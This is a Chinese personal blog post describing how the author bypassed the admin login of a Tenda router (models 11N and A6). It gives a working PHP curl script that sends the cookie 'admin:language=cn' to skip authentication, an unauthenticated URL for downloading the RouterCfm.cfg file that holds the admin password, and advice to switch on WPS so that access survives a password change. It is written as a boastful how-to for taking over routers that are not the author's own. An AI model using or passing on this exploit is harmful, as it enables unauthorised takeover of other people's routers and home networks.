1743天 博客通用头像 Edwiin

本人熟练掌握linux,windows的开关机,擅长nfs,samba,ftp,dhcp,bind,apache,mail等各项服务的安装与卸载,精通shell,mysql,iptables,selinux等单词的拼写,了解虚拟化,存储,集群等相关汉字的书写。

实战绕过腾达某型号路由器后台登陆进入设置界面

发布于 4年前 / 4.9k 次围观 / 0 条评论 / 技术学习 / Edwiin
本文最后更新于2016-12-16,已超过 1 个月没有更新,如果文章内容或图片资源失效,请【留言反馈】,我会及时处理,谢谢!

这个故事很长,可惜只有风听我讲……

在一个寂静的夜晚,我连上了某台腾达路由器,型号什么的看图,然后接上网线,连通电脑,保持本地网络畅通。

PS:还有一种情况,就是连上了某个腾达wif。

默默地用浏览器打开了网关,来到了登陆界面:http://192.168.0.1/login.asp

1.png

乍眼一看,这这这...不是跟乌云的那个腾达漏洞差不多嘛?

然后我测试了一下从index.asp跳转到login.asp 果然没有cookies,那么就应该是那个漏洞了。

然后利用php的curl写了个简单的脚本

<?php
echo "找到路由的备份文件就好了,密码就在里面。腾达的备份文件是RouterCfm.cfg。在工具地址栏输入:http://192.168.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg,然后点获取当前地址源码http_passwd就是登陆密码".'<br>';
$headers = array(
 // 'GET /index.asp HTTP/1.1',
    'Host: 192.168.0.1',
    'Cookie: admin:language=cn;',

);
$url='http://192.168.0.1/index.asp';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 120);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
 ?>

 

运行后的结果如下:

4.png

一目了然,然后Ctrl+U 查看一下网页的源代码

2.png

但是很不幸啊,这个路由器是静态IP或者是动态获取IP,找不到宽带账号和密码,从图中看到密码是88888888,下载配置文件后,就可以看到后台的登陆密码了:

3.png

 

好气,现在科技那么发达,怎么还用那么烂的路由器,害我白白浪费那么多时间,用这破路由器就算了,居然还不用宽带上网,也是66666啊。

那么,上图中,http_passwd= 这后面的就是路由器后台登陆密码,也可以不下载配置文件直接在后台改登陆密码的,只是要是用这个路由器的人有点头脑,就容易被发现。进了管理界面之后,如果有wps功能就打开,这样的话即使他把密码改了,通过wps还是可以轻松拿到密码....哈哈。

其实这个漏洞在几年前就出来了,而且很多软件都能一键破解

有人又要问我,既然那么久的东西现在才发出来,有何用心?

答:别人能装逼,为什么我就不能装逼?呸呸呸,那是因为有人在炫耀他的技术,而我只是把这个炫耀的资本分享给大家罢了。

而且,这是纯手动的,最纯正的,可不是谁谁谁,用个软件,加个语句,就拿出来...只能说大叔你路由器该换了。

哦对了,乌云报道的关于腾达后台登陆漏洞是:admin:language=cn

总结一下就是:使用Cookie注入绕过密码登录Tenda路由管理页 

204259yrrdpbrp7j3b212e.jpg

此方法适用于:腾达路由器11N、腾达路由器A6(如上图)其余腾达未测试。

  • 支付宝赞助图片
  • 微信赞助图片
  • QQ赞助图片
头像
描述: 还好有你,再见如初。
未显示?请点击刷新

Press Space to start